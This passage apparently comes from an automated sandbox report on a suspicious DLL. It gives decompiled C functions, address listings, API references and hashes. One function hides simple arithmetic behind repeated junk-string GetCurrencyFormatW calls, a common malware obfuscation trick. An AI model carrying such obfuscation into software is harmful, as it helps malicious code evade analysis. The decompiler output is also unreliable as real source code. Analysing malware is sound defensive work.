																			_t232 = _t251;
																			_t183 = E1000EF39(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1000EFB3(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1000F010();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1001AB2E(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1001A7F1(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1001AEE4(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E10014E50(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1000A8F0(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1001AA46(_t232, E1000A8F0(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1001AAB3(_t229, _t232, _t260, _v24, E1000A8F0(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1001AC61(_a4, _v24, E1000A8F0(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E1001FC9C(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1000F223(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}





































































                                                                                                            0x1001aee4
                                                                                                            0x1001aee5
                                                                                                            0x1001aee7
                                                                                                            0x1001aee8
                                                                                                            0x1001aeec
                                                                                                            0x1001aeed
                                                                                                            0x1001aeee
                                                                                                            0x1001aef5
                                                                                                            0x1001aefa
                                                                                                            0x1001aefe
                                                                                                            0x1001af00
                                                                                                            0x1001af08
                                                                                                            0x1001af0c
                                                                                                            0x1001af0e
                                                                                                            0x1001af13
                                                                                                            0x1001af16
                                                                                                            0x1001af18
                                                                                                            0x1001af1c
                                                                                                            0x1001af1c
                                                                                                            0x1001af24
                                                                                                            0x1001af26
                                                                                                            0x1001af2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af35
                                                                                                            0x1001af45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af47
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af35
                                                                                                            0x1001af49
                                                                                                            0x1001af49
                                                                                                            0x1001af16
                                                                                                            0x1001af0c
                                                                                                            0x1001af4b
                                                                                                            0x1001af4b
                                                                                                            0x1001af4d
                                                                                                            0x1001af59
                                                                                                            0x1001af5f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af62
                                                                                                            0x1001af69
                                                                                                            0x1001af6a
                                                                                                            0x1001af7c
                                                                                                            0x1001af7e
                                                                                                            0x1001afa1
                                                                                                            0x1001afa1
                                                                                                            0x1001afa4
                                                                                                            0x1001afd4
                                                                                                            0x1001afd9
                                                                                                            0x1001afda
                                                                                                            0x1001afe1
                                                                                                            0x1001afe6
                                                                                                            0x1001afe9
                                                                                                            0x1001afeb
                                                                                                            0x1001aff5
                                                                                                            0x1001afed
                                                                                                            0x1001afed
                                                                                                            0x1001afed
                                                                                                            0x1001aff8
                                                                                                            0x1001affb
                                                                                                            0x1001affe
                                                                                                            0x1001b008
                                                                                                            0x1001b00b
                                                                                                            0x1001b010
                                                                                                            0x1001b015
                                                                                                            0x1001b017
                                                                                                            0x1001b01a
                                                                                                            0x1001b024
                                                                                                            0x1001b02a
                                                                                                            0x1001b02d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b01c
                                                                                                            0x1001b01c
                                                                                                            0x1001b022
                                                                                                            0x1001b033
                                                                                                            0x1001b033
                                                                                                            0x1001b035
                                                                                                            0x1001b0e2
                                                                                                            0x1001b0e4
                                                                                                            0x1001b0e6
                                                                                                            0x1001b0e9
                                                                                                            0x1001b0ee
                                                                                                            0x1001b0f1
                                                                                                            0x1001b0f7
                                                                                                            0x1001b0f7
                                                                                                            0x1001b0f9
                                                                                                            0x1001b100
                                                                                                            0x1001b18a
                                                                                                            0x1001b18f
                                                                                                            0x1001b193
                                                                                                            0x1001b196
                                                                                                            0x1001b2d3
                                                                                                            0x1001b2d6
                                                                                                            0x00000000
                                                                                                            0x1001b2dc
                                                                                                            0x1001b2dc
                                                                                                            0x1001b2df
                                                                                                            0x1001b38f
                                                                                                            0x00000000
                                                                                                            0x1001b2e5
                                                                                                            0x1001b2e5
                                                                                                            0x1001b2e8
                                                                                                            0x1001b396
                                                                                                            0x1001b39a
                                                                                                            0x1001b39f
                                                                                                            0x1001b3a1
                                                                                                            0x00000000
                                                                                                            0x1001b3a7
                                                                                                            0x1001b3a7
                                                                                                            0x1001b3ab
                                                                                                            0x1001b3ae
                                                                                                            0x1001b3b0
                                                                                                            0x1001b3b9
                                                                                                            0x1001b3b2
                                                                                                            0x1001b3b2
                                                                                                            0x1001b3b2
                                                                                                            0x1001b3be
                                                                                                            0x1001b3c0
                                                                                                            0x1001b3c2
                                                                                                            0x00000000
                                                                                                            0x1001b3c8
                                                                                                            0x1001b3c8
                                                                                                            0x1001b3cc
                                                                                                            0x1001b3ce
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3d7
                                                                                                            0x1001b3db
                                                                                                            0x1001b3eb
                                                                                                            0x1001b3ed
                                                                                                            0x1001b3ef
                                                                                                            0x1001b3fc
                                                                                                            0x1001b402
                                                                                                            0x1001b3f1
                                                                                                            0x1001b3f2
                                                                                                            0x1001b3f2
                                                                                                            0x1001b407
                                                                                                            0x1001b409
                                                                                                            0x1001b40b
                                                                                                            0x00000000
                                                                                                            0x1001b411
                                                                                                            0x1001b417
                                                                                                            0x1001b41a
                                                                                                            0x1001b41d
                                                                                                            0x1001b422
                                                                                                            0x1001b425
                                                                                                            0x1001b432
                                                                                                            0x1001b432
                                                                                                            0x00000000
                                                                                                            0x1001b425
                                                                                                            0x1001b3dd
                                                                                                            0x1001b3dd
                                                                                                            0x1001b3e3
                                                                                                            0x00000000
                                                                                                            0x1001b3e3
                                                                                                            0x1001b3db
                                                                                                            0x1001b3c2
                                                                                                            0x1001b2ee
                                                                                                            0x1001b2ee
                                                                                                            0x1001b2f1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b2f1
                                                                                                            0x1001b2e8
                                                                                                            0x1001b2df
                                                                                                            0x00000000
                                                                                                            0x1001b19c
                                                                                                            0x1001b19c
                                                                                                            0x1001b32b
                                                                                                            0x1001b32b
                                                                                                            0x1001b32b
                                                                                                            0x00000000
                                                                                                            0x1001b1a2
                                                                                                            0x1001b1a2
                                                                                                            0x1001b1a5
                                                                                                            0x00000000
                                                                                                            0x1001b1ab
                                                                                                            0x1001b1ab
                                                                                                            0x1001b1ae
                                                                                                            0x1001b24d
                                                                                                            0x1001b24f
                                                                                                            0x00000000
                                                                                                            0x1001b255
                                                                                                            0x1001b257
                                                                                                            0x1001b25d
                                                                                                            0x1001b262
                                                                                                            0x1001b265
                                                                                                            0x1001b268
                                                                                                            0x1001b26d
                                                                                                            0x1001b272
                                                                                                            0x1001b274
                                                                                                            0x00000000
                                                                                                            0x1001b27a
                                                                                                            0x1001b27a
                                                                                                            0x1001b27e
                                                                                                            0x1001b293
                                                                                                            0x1001b295
                                                                                                            0x1001b297
                                                                                                            0x1001b2a5
                                                                                                            0x1001b2a7
                                                                                                            0x1001b299
                                                                                                            0x1001b29a
                                                                                                            0x1001b29a
                                                                                                            0x1001b2ac
                                                                                                            0x1001b2ae
                                                                                                            0x1001b2b0
                                                                                                            0x1001b2b9
                                                                                                            0x1001b2be
                                                                                                            0x1001b2c7
                                                                                                            0x1001b2cd
                                                                                                            0x1001b2cd
                                                                                                            0x1001b280
                                                                                                            0x1001b280
                                                                                                            0x1001b286
                                                                                                            0x1001b288
                                                                                                            0x1001b288
                                                                                                            0x00000000
                                                                                                            0x1001b27e
                                                                                                            0x1001b274
                                                                                                            0x00000000
                                                                                                            0x1001b1b4
                                                                                                            0x1001b1b4
                                                                                                            0x1001b1b7
                                                                                                            0x1001b2f7
                                                                                                            0x1001b2f7
                                                                                                            0x1001b2f9
                                                                                                            0x00000000
                                                                                                            0x1001b2ff
                                                                                                            0x1001b302
                                                                                                            0x1001b307
                                                                                                            0x1001b309
                                                                                                            0x1001b30a
                                                                                                            0x1001b31b
                                                                                                            0x1001b30c
                                                                                                            0x1001b30c
                                                                                                            0x1001b30f
                                                                                                            0x1001b311
                                                                                                            0x1001b311
                                                                                                            0x1001b320
                                                                                                            0x1001b322
                                                                                                            0x1001b324
                                                                                                            0x1001b327
                                                                                                            0x1001b342
                                                                                                            0x1001b342
                                                                                                            0x1001b344
                                                                                                            0x1001b349
                                                                                                            0x1001b34b
                                                                                                            0x1001b359
                                                                                                            0x1001b35c
                                                                                                            0x00000000
                                                                                                            0x1001b362
                                                                                                            0x1001b362
                                                                                                            0x1001b363
                                                                                                            0x1001b364
                                                                                                            0x1001b365
                                                                                                            0x1001b367
                                                                                                            0x1001b36c
                                                                                                            0x1001b36d
                                                                                                            0x1001b370
                                                                                                            0x1001b378
                                                                                                            0x00000000
                                                                                                            0x1001b378
                                                                                                            0x1001b34d
                                                                                                            0x1001b34e
                                                                                                            0x00000000
                                                                                                            0x1001b34e
                                                                                                            0x1001b329
                                                                                                            0x1001b32d
                                                                                                            0x1001b338
                                                                                                            0x1001b33a
                                                                                                            0x1001b33c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b33c
                                                                                                            0x1001b327
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b1b7
                                                                                                            0x1001b1ae
                                                                                                            0x1001b1a5
                                                                                                            0x1001b19c
                                                                                                            0x00000000
                                                                                                            0x1001b106
                                                                                                            0x1001b107
                                                                                                            0x1001b107
                                                                                                            0x1001b108
                                                                                                            0x1001b134
                                                                                                            0x1001b138
                                                                                                            0x1001b13d
                                                                                                            0x1001b144
                                                                                                            0x1001b14a
                                                                                                            0x1001b14a
                                                                                                            0x1001b14e
                                                                                                            0x1001b152
                                                                                                            0x1001b158
                                                                                                            0x1001b158
                                                                                                            0x1001b15c
                                                                                                            0x00000000
                                                                                                            0x1001b162
                                                                                                            0x1001b162
                                                                                                            0x1001b169
                                                                                                            0x1001b16e
                                                                                                            0x1001b170
                                                                                                            0x00000000
                                                                                                            0x1001b172
                                                                                                            0x1001b172
                                                                                                            0x1001b175
                                                                                                            0x1001b177
                                                                                                            0x00000000
                                                                                                            0x1001b179
                                                                                                            0x1001b17a
                                                                                                            0x1001b17c
                                                                                                            0x1001b438
                                                                                                            0x1001b438
                                                                                                            0x1001b438
                                                                                                            0x1001b177
                                                                                                            0x00000000
                                                                                                            0x1001b170
                                                                                                            0x1001b154
                                                                                                            0x1001b154
                                                                                                            0x1001b156
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b156
                                                                                                            0x1001b146
                                                                                                            0x1001b146
                                                                                                            0x1001b148
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b148
                                                                                                            0x1001b10a
                                                                                                            0x1001b10a
                                                                                                            0x1001b10d
                                                                                                            0x1001b1bd
                                                                                                            0x1001b1bd
                                                                                                            0x1001b1c0
                                                                                                            0x1001b1c6
                                                                                                            0x1001b1ce
                                                                                                            0x1001b1d4
                                                                                                            0x1001b1d6
                                                                                                            0x1001b1d9
                                                                                                            0x1001b1e4
                                                                                                            0x1001b1e9
                                                                                                            0x1001b1ec
                                                                                                            0x1001b1f7
                                                                                                            0x1001b1fc
                                                                                                            0x1001b1fc
                                                                                                            0x1001b1ec
                                                                                                            0x1001b1d9
                                                                                                            0x1001b1fd
                                                                                                            0x1001b206
                                                                                                            0x1001b208
                                                                                                            0x1001b20a
                                                                                                            0x1001b21e
                                                                                                            0x1001b224
                                                                                                            0x1001b228
                                                                                                            0x1001b22a
                                                                                                            0x1001b22c
                                                                                                            0x1001b23d
                                                                                                            0x1001b23d
                                                                                                            0x1001b22c
                                                                                                            0x1001b242
                                                                                                            0x1001b113
                                                                                                            0x1001b113
                                                                                                            0x1001b116
                                                                                                            0x1001b129
                                                                                                            0x1001b129
                                                                                                            0x1001b12e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b118
                                                                                                            0x1001b11a
                                                                                                            0x1001b120
                                                                                                            0x1001b123
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b123
                                                                                                            0x1001b116
                                                                                                            0x1001b10d
                                                                                                            0x1001b108
                                                                                                            0x1001b03b
                                                                                                            0x1001b041
                                                                                                            0x1001b043
                                                                                                            0x1001b043
                                                                                                            0x1001b047
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b04f
                                                                                                            0x1001b054
                                                                                                            0x1001b057
                                                                                                            0x1001b064
                                                                                                            0x1001b066
                                                                                                            0x1001b068
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b068
                                                                                                            0x00000000
                                                                                                            0x1001b057
                                                                                                            0x1001b06a
                                                                                                            0x1001b06c
                                                                                                            0x1001b091
                                                                                                            0x1001b091
                                                                                                            0x1001b098
                                                                                                            0x1001b0a8
                                                                                                            0x1001b0a8
                                                                                                            0x1001b0aa
                                                                                                            0x00000000
                                                                                                            0x1001b0ac
                                                                                                            0x1001b0ac
                                                                                                            0x1001b0af
                                                                                                            0x1001b0b1
                                                                                                            0x00000000
                                                                                                            0x1001b0b3
                                                                                                            0x1001b0b6
                                                                                                            0x1001b0ba
                                                                                                            0x1001b0be
                                                                                                            0x1001b0c9
                                                                                                            0x1001b0c9
                                                                                                            0x1001b0cd
                                                                                                            0x00000000
                                                                                                            0x1001b0cf
                                                                                                            0x1001b0cf
                                                                                                            0x1001b0d6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b0d6
                                                                                                            0x1001b0c0
                                                                                                            0x1001b0c0
                                                                                                            0x1001b0c7
                                                                                                            0x1001b0d8
                                                                                                            0x1001b0d8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b0c7
                                                                                                            0x1001b0be
                                                                                                            0x1001b0b1
                                                                                                            0x1001b09a
                                                                                                            0x1001b09a
                                                                                                            0x1001b09d
                                                                                                            0x00000000
                                                                                                            0x1001b09f
                                                                                                            0x1001b09f
                                                                                                            0x1001b0a6
                                                                                                            0x1001b0df
                                                                                                            0x1001b0df
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b0a6
                                                                                                            0x1001b09d
                                                                                                            0x1001b06e
                                                                                                            0x1001b06e
                                                                                                            0x1001b071
                                                                                                            0x1001b073
                                                                                                            0x00000000
                                                                                                            0x1001b075
                                                                                                            0x1001b075
                                                                                                            0x1001b079
                                                                                                            0x00000000
                                                                                                            0x1001b07b
                                                                                                            0x1001b07b
                                                                                                            0x1001b081
                                                                                                            0x1001b084
                                                                                                            0x1001b087
                                                                                                            0x1001b089
                                                                                                            0x00000000
                                                                                                            0x1001b08b
                                                                                                            0x1001b08b
                                                                                                            0x1001b08b
                                                                                                            0x1001b089
                                                                                                            0x1001b079
                                                                                                            0x1001b073
                                                                                                            0x1001b06c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b022
                                                                                                            0x1001b24a
                                                                                                            0x1001afa6
                                                                                                            0x1001afa6
                                                                                                            0x1001afab
                                                                                                            0x1001afae
                                                                                                            0x1001afb3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001afb3
                                                                                                            0x1001af80
                                                                                                            0x1001af80
                                                                                                            0x1001af85
                                                                                                            0x1001af8c
                                                                                                            0x1001af87
                                                                                                            0x1001af87
                                                                                                            0x1001af87
                                                                                                            0x1001af90
                                                                                                            0x00000000
                                                                                                            0x1001af92
                                                                                                            0x1001af9b
                                                                                                            0x1001afb5
                                                                                                            0x1001afb5
                                                                                                            0x1001afb8
                                                                                                            0x00000000
                                                                                                            0x1001afba
                                                                                                            0x1001afba
                                                                                                            0x1001afbd
                                                                                                            0x1001afbf
                                                                                                            0x1001afbf
                                                                                                            0x1001afc2
                                                                                                            0x1001afc3
                                                                                                            0x1001afc9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001afc9
                                                                                                            0x1001af9d
                                                                                                            0x1001af9d
                                                                                                            0x1001af9d
                                                                                                            0x1001afcd
                                                                                                            0x1001afd1
                                                                                                            0x1001afd1
                                                                                                            0x1001af9b
                                                                                                            0x1001af90
                                                                                                            0x1001af6c
                                                                                                            0x1001af6c
                                                                                                            0x1001af76
                                                                                                            0x1001af7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af7a
                                                                                                            0x00000000
                                                                                                            0x1001af6a
                                                                                                            0x1001afcb
                                                                                                            0x1001afcb
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetFocus.USER32(?), ref: 1001AF37
                                                                                                            • IsWindowEnabled.USER32(?), ref: 1001AF93
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001AFE1
                                                                                                            • GetFocus.USER32(00000028,?,00000000,?), ref: 1001B001
                                                                                                            • GetParent.USER32(?), ref: 1001B04C
                                                                                                            • GetParent.USER32(?), ref: 1001B05C
                                                                                                            • GetKeyState.USER32(00000012), ref: 1001B11A
                                                                                                            • IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1CE
                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1E1
                                                                                                            • GetFocus.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1EE
                                                                                                            • IsWindow.USER32(?), ref: 1001B206
                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B212
                                                                                                            • IsWindow.USER32(?), ref: 1001B228
                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B22E
                                                                                                            • GetKeyState.USER32(00000010), ref: 1001B257
                                                                                                            • MessageBeep.USER32(00000000), ref: 1001B34E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                            • String ID:
                                                                                                            • API String ID: 656273425-0
                                                                                                            • Opcode ID: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
                                                                                                            • Instruction ID: 56f928e57334fa6d51f2d895fa8adec4f86d4fba5de9bb308060e6b64de8da3e
                                                                                                            • Opcode Fuzzy Hash: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
                                                                                                            • Instruction Fuzzy Hash: 12F1DF35900A16AFDB11DFA0C894AAE7BF5EF49390F528029F815AF162DB34EDC1CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003567 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10003567(int _a4) {
				long _t40;
				signed int _t54;
				int _t55;
				signed int _t63;
				void* _t87;
				short* _t89;

				_t87 = _a4;
				_t35 = 0;
				if(_t87 != 0) {
					_t89 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
						_a4 =  *((intOrPtr*)(_t87 + 4));
						_t63 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						 *((intOrPtr*)(_t63 *  *0x100440d8 +  *((intOrPtr*)( *_t87 + 0x28)) + _a4))(_a4, 0, 0);
						_t35 = 0;
					}
					 *0x10046a64( *((intOrPtr*)(_t87 + 0x30)) + GetCurrencyFormatW(_t35, 0x11d4, _t89, _t35, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc * 8);
					_t40 = 0;
					if( *((intOrPtr*)(_t87 + 8)) == 0) {
						L9:
						if( *((intOrPtr*)(_t87 + 4)) != _t40) {
							 *((intOrPtr*)(_t87 + 0x20))( *((intOrPtr*)(_t87 + 4)), 0, GetCurrencyFormatW(_t40, 0x11d4, _t89, _t40, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x8000,  *((intOrPtr*)(_t87 + 0x34)));
							_t40 = 0;
						}
						return HeapFree(GetProcessHeap(), _t40, _t87);
					} else {
						_a4 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)) <= 0) {
							L8:
							 *0x10046a64( *((intOrPtr*)(_t87 + 8)) + GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 4);
							_t40 = 0;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t54 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t55 = 0;
							if( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (_t54 *  *0x100440cc + _a4) * 4)) != 0) {
								 *((intOrPtr*)(_t87 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _a4) * 4)),  *((intOrPtr*)(_t87 + 0x34)));
								_t55 = 0;
							}
							_a4 = _a4 + 1;
						} while (_a4 < GetCurrencyFormatW(_t55, 0x11d4, _t89, _t55, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)));
						goto L8;
					}
				}
				return 0;
			}









                                                                                                            0x10003568
                                                                                                            0x1000356c
                                                                                                            0x10003570
                                                                                                            0x10003582
                                                                                                            0x1000358c
                                                                                                            0x1000359f
                                                                                                            0x100035a3
                                                                                                            0x100035bd
                                                                                                            0x100035bf
                                                                                                            0x100035bf
                                                                                                            0x100035df
                                                                                                            0x100035e5
                                                                                                            0x100035eb
